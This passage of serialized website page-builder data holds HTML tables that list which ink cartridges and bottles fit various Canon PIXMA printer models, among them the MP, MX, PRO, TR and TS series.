width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL 